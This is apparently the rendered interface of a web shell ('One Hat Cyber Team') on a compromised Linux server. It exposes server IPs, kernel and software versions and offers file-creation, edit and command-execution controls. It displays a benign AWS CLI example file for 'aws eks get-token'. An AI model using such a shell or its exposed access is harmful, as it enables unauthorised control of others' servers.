⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.25
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
eks
/
Edit File: get-token.rst
**To get a cluster authentication token** This example command gets an authentication token for a cluster named ``example``. Command:: aws eks get-token --cluster-name example Output:: { "kind": "ExecCredential", "apiVersion": "client.authentication.k8s.io/v1alpha1", "spec": {}, "status": { "expirationTimestamp": "2019-08-14T18:44:27Z", "token": "k8s-aws-v1EXAMPLE_TOKEN_DATA_STRING..." } }
Simpan